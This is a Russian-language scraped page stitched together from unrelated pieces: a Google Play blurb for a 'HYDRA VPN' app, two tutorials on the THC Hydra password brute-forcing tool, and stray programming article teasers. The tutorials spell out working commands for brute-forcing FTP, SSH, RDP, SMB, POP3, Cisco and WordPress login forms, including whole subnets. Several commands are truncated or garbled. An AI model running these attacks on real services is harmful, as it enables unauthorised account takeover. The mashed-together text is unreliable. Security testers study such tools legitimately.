• VPN для Германии
• VPN для Гонконга
• VPN для России
• VPN для Швейцарии
• VPN для Японии
• VPN для Дании
• VPN для Мексики
• VPN для Италии
• VPN для Украины
• VPN для Франции
•VPN для Испании
•VPN для Австралии
• VPN для Сингапура
•VPN для Швеции
•VPN для Великобритании
•VPN для Ирландии
•VPN для Румынии
•VPN для США
•VPN для Нидерландов
•VPN для Канады
•VPN для Турции
•VPN для Болгарии
•VPN для Чехии
• HYDRA VPN можно использовать как:
— Игровой VPN
— Просмотр VPN
— Быстрый VPN
— Бесплатный VPN
— Потоковое видео VPN
— Легко использовать
— Свободное время
— Многочисленные серверы на ваш выбор
— Быстрое подключение
— Меньше занимаемого места
— Умный алгоритм подключения
— Щит в общедоступном Wi-Fi и браузере
— Предоставляет призрачный IP-адрес
— Доступ в Интернет с полной безопасностью
— Отсутствие риска утечки данных.
Что происходит с Hydra и её основателем?
— Частный доступ к веб-сайтам
— Частный доступ к приложениям
HYDRA VPN удобен для пользовательского интерфейса с привлекательным дизайном и красивой компоновкой. Это бесплатный VPN для повседневного использования.
Его легко использовать. Выберите сервер вашего типа и нажмите кнопку Подключиться. Он подключится автоматически, и вы сможете использовать виртуальную частную сеть.
Источник: play.google.com
Hydra – полная инструкция по использованию и настройке
Hydra – это программное обеспечение с открытым исходным кодом для перебора паролей в реальном времени от различных онлайн сервисов, веб-приложений, FTP, SSH и других протоколов. Особенность Hydra в том, что здесь выполняется перебор не по хэшу, а напрямую с помощью запросов к серверу, это значит что вы сможете проверить правильно ли настроены фаерволы, блокируются ли такие попытки, а также можете ли вы вообще определить такую атаку на сервер. В этой статье мы рассмотрим как пользоваться thc hydra для перебора паролей.
Программа hydra поддерживает огромное количество служб, благодаря своей быстроте и надёжности она завоевала заслуженную признательность среди тестеров на проникновение. Будучи очень мощной и гибкой, программу hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она значительно автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и даже не нужно искать файлы с именами и паролями, поскольку они поставляются вместе с программой.
В настоящее время поддерживаются следующие протоколы: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.
Установка Hydra
Первым делом нам необходимо установить этот инструмент. Это довольно популярная утилита для тестирования безопасности, поэтому вы можете найти ее в официальных репозиториях. Для установки нужных пакетов в Ubuntu выполните:
sudo apt install hydra
Чтобы установить программу в Red Hat/CentOS команда аналогичная:
sudo yum install hydra
Но в официальных репозиториях, как правило, находятся более старые версии программы. Если вы хотите самую свежую, то придется собрать ее из исходников. Но здесь нет ничего сложного. Сначала загрузим исходники последней версии с GitHub, на данный момент, это 8.4:
Затем необходимо их распаковать и перейти в папку с исходниками:
tar xvpzf thc-hydra-v8.4.tar.gz
$ cd thc-hydra-v8.4
Дальше выполните такие команды для компиляции и установки:
./configure
$ make
$ sudo make install
Разработчики поступили очень грамотно, когда настроили установку в /usr/local. Таким образом, утилита не распространится по всей файловой системе, а будет в одном месте. Если вы еще хотите установить графическую оболочку, то вам нужно переместиться в папку hydra-gtk и выполнить те же команды:
cd hydra-gtk
$ ./configure
$ make
$ sudo make install
Нужно заметить, что для ее сборки необходимы пакеты разработки gtk2. Но я бы не советовал вам использовать этот графический интерфейс. Если разобраться в работе с утилитой через терминал, то он совсем не нужен, тем более, что вся гибкость утилиты раскрывается через командную строку.
Программа THC – HYDRA
Перед тем как мы начнем рассматривать как пользоваться htc hydra, нам необходимо разобраться какие параметры команде передавать и как это делать. Давайте сначала рассмотрим общий синтаксис:
$ hydra опции логины пароли -s порт адрес_цели модуль параметры_модуля
Опции задают глобальные параметры утилиты, с помощью них вы можете настроить необходимые параметры, например, указать что нужно выводить информацию очень подробно, список логинов и паролей для перебора задается тоже с помощью опций, но я выделил его в отдельный пункт. Дальше нужно задать порт сервиса на удаленной машине и ip адрес цели. В конце мы задаем модуль перебора, который будем использовать и параметры модуля. Обычно это самая интересная часть но начнем мы с опций:
- -R – восстановить ранее прерванную сессию Hydra;
- -S – использовать SSL для подключения;
- -s – указать порт;
- -l – использовать логин;
- -L – выбирать логины из файла со списком;
- -p – использовать пароль;
- -P – использовать пароль из файла со списком;
- -M – взять список целей из файла;
- -x – генератор паролей;
- -u – по умолчанию hydra проверяет все пароли для первого логина, эта опция позволяет проверить один пароль для всех логинов;
- -f – выйти, если правильный логин/пароль найден;
- -o – сохранить результат в файл;
- -t – количество потоков для программы;
- -w – время между запросами в секундах;
- -v – подробный вывод;
- -V – выводить тестируемые логины и пароли.
Это были основные опции, которые, вы будете использовать. Теперь рассмотрим модули, а также способы аутентификации, которые вы можете подобрать:
- adam6500;
- asterisk;
- cisco;
- cisco-enable;
- cvs;
- ftp;
- http-head;
- http-get;
- http-post;
- http-get-form;
- http-post-form;
- http-proxy;
- http-proxy-urlenum;
- icq;
- imap;
- irc;
- ldap2;
- ldap3;
- mssql;
- nntp;
- pcanywhere;
- pcnfs;
- pop3;
- redis;
- rexec;
- rlogin;
- rpcap;
- rsh;
- rtsp;
- s7-300;
- smb;
- smtp;
- smtp-enum;
- snmp;
- socks5;
- ssh;
- teamspeak;
- telnet;
- vmauthd;
- vnc;
- xmpp.
Как видите, количество доступных протоколов достаточно большое, вы можете проверить безопасность как ssh, ftp, и до веб-форм. Дальше мы рассмотрим как пользоваться hydra, как использовать самые часто применяемые протоколы.
Как пользоваться THC – HYDRA
Как вы уже догадались, hydra перебирает пароли из переданного ей файла, оттуда же берутся и логины. Также вы можете попросить программу генерировать пароли самостоятельно, на основе регулярного выражения. А вот уже их подстановка и передача на удаленный сервер настраивается с помощью строки параметров модуля. Естественно, что файлы с паролями нужно заготовить.
Можно использовать словари топ500 паролей, и от Cain ssl=1″ />
Как вы помните опция -l задает логин пользователя, -P – файл со списком паролей. Далее мы просто указываем протокол и айпи цели. Готово, вот так просто можно перебрать пароль от вашего FTP, если вы установили его слишком простым и не настроили защиты. Как видите, утилита перебирает пароли со скоростью 300 шт в минуту. Это не очень быстро, но для простых паролей достаточно опасно. Если вы хотите получить больше информации во время перебора нужно использовать опции -v и -V вместе:
hydra -l admin -P john.txt -vV ftp://127.0.0.1
Также, с помощью синтаксиса квадратных скобок, вы можете задать не одну цель, а атаковать сразу целую сеть или подсеть:
hydra -l admin -P john.txt ftp://[192.168.0.0/24]
Также вы можете брать цели из файла со списком. Для этого используется опция -M:
hydra -l admin -P john.txt -M targets.txt ftp
Если подбор по словарю не сработал, можно применить перебор с автоматической генерацией символов, на основе заданного набора. Вместо списка паролей нужно задать опцию -x а ей передать строку с параметрами перебора. Синтаксис ее такой:
минимальная_длина:максимальная_длина:набор_символов
С максимальным и минимальным количеством, я думаю все понятно, они указываются цифрами. В наборе символов нужно указать a для всех букв в нижнем регистре, A – для букв в верхнем регистре и 1 для всех цифр от 0 до 9. Дополнительные символы указываются после этой конструкции как есть. Например:
- 4:4:1 – пароль размером четыре символа, состоящий только из цифр. А именно все пароли в диапазоне 0000-9999;
- 4:8:1 – пароль от четырех до восьми символов, только из цифр;
- 4:5:aA1. – пароль, размером от 4 до 5 символов, состоит из цифр, букв верхнего и нижнего регистра или точки.
Вся команда будет выглядеть вот так:
hydra -l admin -x 4:4:aA1. ftp://127.0.0.1
Можно пойти другим путем и указать ip цели и порт вручную с помощью опции -s, а затем указать модуль:
hydra -l admin -x 4:4:aA1 -s 21 127.0.0.1 ftp
Пароли для ssh, telet и других подобных сервисов перебираются подобным образом. Но более интересно рассмотреть перебор паролей для http и html форм.
Перебор пароля аутентификацией HTTP
Различные роутеры часто используют аутентификацию на основе HTTP. Перебор пароля от такого типа формы входа выполняется очень похожим образом на ftp и ssh. Строка запуска программы будет выглядеть вот так:
hydra -l admin -P ~/john.txt -o ./result.log -V -s 80 127.0.0.1 http-get /login/
Здесь мы использовали логин admin, список паролей из файла john.txt, адрес цели 127.0.0.1 и порт 80, а также модуль http-get. В параметрах модулю нужно передать только адрес страницы входа на сервере. Как видите, все не так сильно отличается.
Перебор паролей ВЕБ – ФОРМ
Самый сложный вариант – это перебор паролей для веб-форм. Здесь нам нужно узнать что передает на сервер нужная форма в браузере, а затем передать в точности те же данные с помощью hydra. Вы можете посмотреть какие поля передает браузер с помощью перехвата в wireshark, tcpdump, в консоли разработчика и так далее. Но проще всего открыть исходный код формы и посмотреть что она из себя представляет. Далеко ходить не будем и возьмем форму WordPress:
Как видите, передаются два поля log и pwd, нас будут интересовать только значения полей input. Здесь несложно догадаться, что это логин и пароль. Поскольку форма использует метод POST для передачи данных, то нам нужно выбрать модуль http-post-form. Синтаксис строки параметров будет выглядеть вот так:
адрес_страницы:имя_поля_логина=^USER^произвольное_поле=значение:строка_при_неудачном_входе
Строчка запуска программы будет выглядеть вот так:
hydra -l user -P ~/john.txt -o ./result.log -V -s 80 127.0.0.1 http-post-form «/wp-admin:log=^USER^
Переменные ^USER^ и ^PASS^ содержат имя пользователя и пароль взятые из словаря, также, возможно, придется передать дополнительные параметры, они передаются также, только значения будут фиксированы. Заканчивается выражение строкой, которая присутствует на странице при неудачном входе. Скорость перебора может достигать 1000 паролей в минуту, что очень быстро.
Графическая утилита XHYDRA
Хотелось бы еще сказать несколько слов про графическую версию. Это просо интерфейс, который помогает вам сформировать команду для консольной hydra. Главное окно программы выглядит вот так:
Здесь есть несколько вкладок:
- Target – цели атаки;
- Passwords – списки паролей;
- Tuning – дополнительные настройки;
- Specific – настройки модулей;
- Start – запуск и просмотр статуса атаки.
Вы без труда во всем этом разберетесь когда освоите консольный вариант.
Источник: gitjournal.tech
Введение в Гидру
Hydra — это инструмент для взлома паролей с открытым исходным кодом, разработанный известной хакерской организацией thc, который может взламывать различные пароли в Интернете. Он был включен в платформы для проникновения, такие как Backtrack и kali. Помимо Hydra из командной строки также предоставляется версия Hydra-GTK (Hydra с графическим интерфейсом). Ее официальный сайт:http://www.thc.org/thc-hydra。
Последняя версия Hydra — Hydra 7.6, которая поддерживает AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, uHTTP-FORM-GET, HTTP-FORM-POST, HTTP. -GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-прокси, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 и v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, XMPP и другие типы взлома паролей.
Установка и использование гидры
Hydra можно установить и использовать в средах Debian и Ubuntu.
1. Установите Hydra в среде Debian и Ubuntu
Если это выпуск Debian и Ubuntu, он будет поставляться с Hydra, вы можете напрямую использовать команду apt-get для установки онлайн, команда выглядит следующим образом.
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra
Если вы хотите скомпилировать и установить пакет с исходным кодом выпуска Redhat / Fedora, вам нужно сначала установить соответствующие пакеты зависимостей.Команда следующая.
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
2. Установить CentOS
Команда установки CentOS выглядит следующим образом.
# tar zxvf hydra-7.6-src.tar.gz # cd hydra-6.0-src # ./configure # make # make install
3. Использовать Гидру
У BT5 и kali по умолчанию установлена Hydra. В kali нажмите «kali Linux» → «Парольные атаки» → «Online Attacks» → «Hydra», чтобы открыть Hydra. В терминале CentOS введите команду «/ usr / local / bin / hydra», чтобы открыть инструмент грубой силы. Кроме того, вы также можете использовать команду «hydra-wizard.sh» для настроек в стиле мастера для взлома пароля.
4. Установить libssh
Если libssh не установлен, при запуске Hydra для взлома учетной записи возникнет ошибка. Как показано на рисунке ниже, отображается сообщение об ошибке «[ОШИБКА] Скомпилировано без поддержки LIBSSH v0.4.x, модуль недоступен!». Выполните следующую команду в CentOS, чтобы решить эту проблему.
yum install cmake wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz tar zxf libssh-0.4.8.tar.gz cd libssh-0.4.8 mkdir build cd build cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON .. make make install cd /test/ssh/hydra-7.6 // Это каталог, в который загружается и распаковывается Hydar make clean ./configure make make install
5. Подробное описание параметра Hydra
Пример команды Hydra выглядит следующим образом.
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
- -l ВХОД: укажите имя взломанного пользователя для взлома для конкретного пользователя.
- -L ФАЙЛ: загрузить имя пользователя из файла для взлома.
- -p PASS: строчная буква «p», указать взлом пароля, использовать меньше, обычно использовать словарь паролей.
- -P ФАЙЛ: заглавная буква «P», укажите словарь паролей.
- -C ФАЙЛ: использовать формат, разделенный двоеточиями, например «имя пользователя: пароль» вместо параметров «-L» и «-P».
- -e nsr: необязательный параметр, «n» означает пустой тест пароля, «s» означает использование указанного пользователя и теста пароля.
- -t ЗАДАЧИ: количество подключенных потоков, работающих одновременно, каждый хост по умолчанию равен 16.
- -M ФАЙЛ: указать по одному файлу списка целей сервера в каждой строке.
- -w ВРЕМЯ: установить максимальное время ожидания в секундах, по умолчанию — 30 секунд.
- -o ФАЙЛ: укажите файл вывода результатов.
- -f: после использования параметра «-M» прекратить взлом, когда будет найдена первая пара имени входа или пароля.
- -v / -V: Показать подробный процесс.
- -R: Продолжить последний взлом.
- -S: использовать ссылку SSL.
- -s ПОРТ: с помощью этого параметра можно указать порт, отличный от порта по умолчанию.
- -U: сведения об использовании служебного модуля.
- -h: Дополнительные параметры командной строки (полная справочная документация).
- server: имя целевого сервера или IP-адрес (используйте эту опцию или опцию «-M»).
- service: укажите имя службы, поддерживаемые службы и протоколы включают Telnet, FTP, POP3 [-ntlm], IMAP [-ntlm], SMB, SMB NT, http [s] — , http- -form, http-proxy, Cisco, Cisco-Enable, VNC, LDAP2, LDAP3, MSSQL, MySQL, Oracle-Listener, Postgres, NNTP, Socks5, REXEC, Rlogin, PCNFS, SNMP, RSH, CVS, SVN, ICQ, SAPR3, SSH2, SMTP-Auth [-ntlm], pcAnywhere, TeamSpeak, SIP, Vmauthd, Firebird, NCP, AFP и т. Д.
- OPT: Некоторые сервисные модули поддерживают дополнительный ввод (опция «-U» используется для получения справочной информации для модуля).
Пример использования Hydra
В этом разделе приведены примеры использования Hydra.
1. Взломать SSH аккаунт
Существует два способа взломать учетную запись SSH: один — взломать указанную учетную запись, а другой — взломать указанный список пользователей.
hydra -l имя пользователя -p Словарь паролей -t Нить -vV -e ns ip ssh
Например, введите команду «hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh», чтобы взломать пароль учетной записи root с IP-адресом 192.168.44.139. После успешного взлома подробная информация отображается следующим образом .
введите команду «hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh», чтобы сохранить результаты сканирования в файле save.log. , Используйте команду «cat save.log» для просмотра результатов сканирования, как показано ниже.
2. Взломать учетную запись FTP
(1) Взломать указанное имя пользователя и пароль
hydra ip ftp -l имя пользователя -P Словарь паролей -t Резьба (по умолчанию16) -vV hydra ip ftp -l имя пользователя -P Словарь паролей -e ns -vV
(2) Взлом учетных записей FTP и паролей в пакетном режиме
hydra -L list_user -P list_password 192.168.56.101 ftp -V
Взломайте пароль FTP-сервера (192.168.56.101).
3. Отправить через GET, взломать веб-вход
hydra -l имя пользователя -p Словарь паролей -t Нить -vV -e ns ip http-get /admin/ hydra -l имя пользователя -p Словарь паролей -t Нить -vV -e ns -f ip http-get /admin/index.php
4. Отправить через POST, взломать веб-вход
(1) hydra -l имя пользователя -P словарь паролей -s 80 ip http-post-form «/admin/login.php: username = ^ USER ^ submit = login: извините пароль»
hydra -L list_user -P list_password 192.168.0.115 http-post-form «member.php?mod=loggingloginsubmit=yeslssubmit=yesusername=^USER^quickforward=yes –V
Приведенный выше пример означает, что для взлома 192.168.0.115 вам необходимо определить URL-адрес входа и установить флажки проверки входа и неправильные флаги входа в систему. Эффект показан на рисунке.
member.php?mod=loggingloginsubmit=yeslssubmit=yesusername=^USER^quickforward=yeslogin.php:id=^USER^
«-T» означает, что количество потоков одновременно равно 3; «-l» означает, что имя пользователя — «admin», словарь — pass.txt, сохранить как out.txt; «-f» означает, что он остановится после взлома 1 пароля; «192.168. «0.115» означает целевой IP-адрес; «http-post-form» означает использование метода HTTP POST для отправки запроса на взлом пароля формы; содержимое в «» — это запрос с возвращаемой информацией о неправильном предположении.
5. Взломать HTTPS
hydra -m /index.php -l muts -P pass.txt 192.168.0.115 https
6. Взломать teampeak
hydra -l имя пользователя -P Словарь паролей -s Номер порта -vV ip teamspeak
7. Взломать Cisco
hydra -P pass.txt 192.168.0.115 cisco hydra -m cloud -P pass.txt 192.168.0.115 cisco-enable
8. Взломать SMB
hydra -l administrator -P pass.txt 192.168.0.115 smb
9. Взломать POP3
hydra -l muts -P pass.txt my.pop3.mail pop3
10. Взломать учетную запись удаленного терминала
(1) Взломать учетную запись администратора
hydra ip rdp -l administrator -P pass.txt -V
(2) Взламывать аккаунты партиями
hydra -s 3389 192.168.44.138 rdp -L user.txt -P pwd.txt –V
Эффект растрескивания показан на рисунке.
11. Взломать HTTP-прокси
hydra -l admin -P pass.txt http-proxy://192.168.0.115
12. Взломать IMAP
hydra -L user.txt -p secret 192.168.0.115 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
Эта статья выбрана из «Хакерская атака и защита: фактическое боевое шифрование и дешифрование».
Если вы хотите вовремя получать больше интересных статей, вы можете выполнить поиск по запросу «точка зрения блога» в WeChat или отсканировать QR-код ниже и следовать.
Интеллектуальная рекомендация
Самая левая цифра (отчет о решении проблем)
Leftmost Digit Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) Total Submission(s): 364 Accepted Submission(s): 198 Problem Description Given a positive integer N, you.
Об перенаправленном перенаправлении по перенаправлению с проблемой запроса параметров
Turn: CommandButton и CommandLink передают значения в JSF
Трансфер из:http://www.zhlwish.com/2009/12/31/jsf_commandbutton_commandlink/ Тег f: param добавляет параметр в компонент. Обратите внимание, чтоРазличная производительность тега f: param зависи.
Различия о функции стрелки ES6 и функции ES5
В подходе к интерфейсу разница в отношении функции стрелки и нормальных функций Наиболее начало, просто подумайте, что функция стрелки — это просто синтаксический сахар функции ES5. Это также отличает.
[Android Advanced Notes] Механизм (Handler, Looper, MessageQueue)
Статьи Справочник 1. Механизм сообщений Android 1.1. Модель механизма сообщений 1.2. Роль механизма сообщения 2. MessageQueue 2.1. Вставки MessageQueue 2.2. 2.3. 3. Lopper 3.1.
Создание и выход Looper.
Источник: russianblogs.com